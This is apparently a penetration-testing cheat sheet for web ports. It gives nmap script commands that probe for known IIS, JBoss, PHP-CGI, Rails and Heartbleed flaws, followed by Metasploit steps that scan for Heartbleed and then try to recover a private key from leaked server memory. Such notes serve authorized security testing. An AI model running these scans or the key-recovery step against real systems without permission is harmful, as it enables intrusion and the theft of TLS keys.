80/443 - HTTP/HTTPS

Identification and Checks

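# Each line below runs one NSE check script and reports a verdict for that script only.
# Some of these scripts verify by sending a probe request, so expect matching entries in
# the target's web-server logs and IDS alerts.
# Shared flags: -Pn skip host discovery (scan even when ping is filtered), -n no DNS
# resolution, -T3 normal timing, -v verbose, -sV service/version detection at intensity 5,
# -p the single port to check. -Pn is needed once per line, not twice.

# IIS
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 80 --script=http-iis-webdav-vuln <IP>

# JBOSS (CVE-2010-0738)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 80 --script=http-vuln-cve2010-0738 <IP>

# PHP-CGI (CVE-2012-1823)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 80 --script=http-vuln-cve2012-1823 <IP>

# RCE Ruby on Rails (CVE-2013-0156)
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 80 --script=http-vuln-cve2013-0156 <IP>

# WAF Detection
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 80 --script=http-waf-detect,http-waf-fingerprint <IP>

# Check Heartbleed CVE-2014-0160
# ssl-enum-ciphers additionally grades the offered cipher suites and ssl-known-key flags
# certificates whose key appears in nmap's known-compromised-key list.
# --script-args vulns.showall makes the vulns library print NOT VULNERABLE results as well,
# so a clean host is reported explicitly instead of producing no output.
nmap -Pn -n -T3 -v -sV --version-intensity=5 -p 443 --script=ssl-heartbleed,ssl-enum-ciphers,ssl-known-key --script-args vulns.showall <IP>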


Heartbleed Exploitation (CVE-2014-0160)

# Using metasploit
# The SCAN action only reports whether the service appears to leak heartbeat memory.
use auxiliary/scanner/ssl/openssl_heartbleed
set action SCAN
# '...' stands for the module's remaining options (target host/port); set them before run.
...
run
   
# The KEYS action goes beyond a check and attempts key recovery from the leaked memory;
# it reuses the options set above.
set action KEYS
run